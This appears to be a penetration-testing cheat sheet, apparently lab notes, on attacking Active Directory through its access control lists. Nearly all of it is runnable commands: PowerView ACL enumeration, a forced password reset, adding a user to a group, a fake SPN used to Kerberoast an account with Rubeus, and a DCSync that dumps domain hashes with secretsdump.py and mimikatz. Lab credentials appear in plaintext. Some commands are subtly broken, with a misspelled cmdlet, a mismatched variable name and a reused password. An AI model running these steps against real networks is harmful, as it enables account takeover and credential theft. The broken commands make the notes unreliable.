Access Control Lists and Entries (ACL & ACE)

ACL Enumeration

Find Interesting ACL

# Find ACL
Find-IntrestingDomainAcl

# More Effectively, filter by user(s) we have control
$sid = Convert-NameToSid <username>
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}

# Reverse GUID (ObjectAceType)
$guid= <ObjectAceType-Value>
Get-ADObject -SearchBase "CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)" -Filter {ObjectClass -like 'ControlAccessRight'} -Properties * |Select Name,DisplayName,DistinguishedName,rightsGuid| ?{$_.rightsGuid -eq $guid} | fl

# Powerview All in 1 Command
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid} 

Show All Rights That User Has

# Create Variable
$user-priv = Convert-NameToSid damundsen

# Show Rights
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $user-priv2} -Verbose | select AceType, ObjectDN, ActiveDirectoryRights

Enumerate Nested Group

# Check Nested Group of HelpDesk
Get-DomainGroup -Identity "Help Desk Level 1" | select memberof

# Check Discovered Nested Group
$itgroupsid = Convert-NameToSid "Information Technology"
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $itgroupsid} -Verbose | select AceType, ObjectDN, ActiveDirectoryRight

# Discoveed Object DN Enumeration
$adunnsid = Convert-NameToSid adunn
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $adunnsid} -Verbose

Abusing ACL

Change Password

# PowerShell Console As Desired User
$SecPassword = ConvertTo-SecureString 'transporter@4' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)

# Creating Password for Target User
$Password = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force

# Create Password
Set-DomainUserPassword -Identity damundsen -AccountPassword $Password -Credential $Cred -Verbose

$Cred2 = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\damundsen', $SecPassword) 


# Add User to Group
Add-DomainGroupMember -Identity 'Help Desk Level 1' -Members 'damundsen' -Credential $Cred2 -Verbose

# Verify User is Added
Get-DomainGroupMember -Identity "Help Desk Level 1" | Select MemberName

Create Fake SPN - GenericWrite

# Create SPN
Set-DomainObject -Credential $Cred2 -Identity adunn -SET @{serviceprincipalname='notahacker/LEGIT'} -Verbose

# Get User Hash
.\Rubeus.exe kerberoast /user:adunn /nowrap

Cleaning Up

# Remove SPN
Set-DomainObject -Credential $Cred2 -Identity adunn -Clear serviceprincipalname -Verbose

# Remove User From Group
Remove-DomainGroupMember -Identity "Help Desk Level 1" -Members 'damundsen' -Credential $Cred2 -Verbose

DCSync

Manual

Enumeration Steps

# List Group Membership 
Get-DomainUser -Identity adunn  |select samaccountname,objectsid,memberof

# Review ObjectSID
$sid= "<Value-sid-bject>"

# Verify DC-Sync Rights
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl

Exploitation Steps

secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 

Mimikatz

# Mimikatz DCSync
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator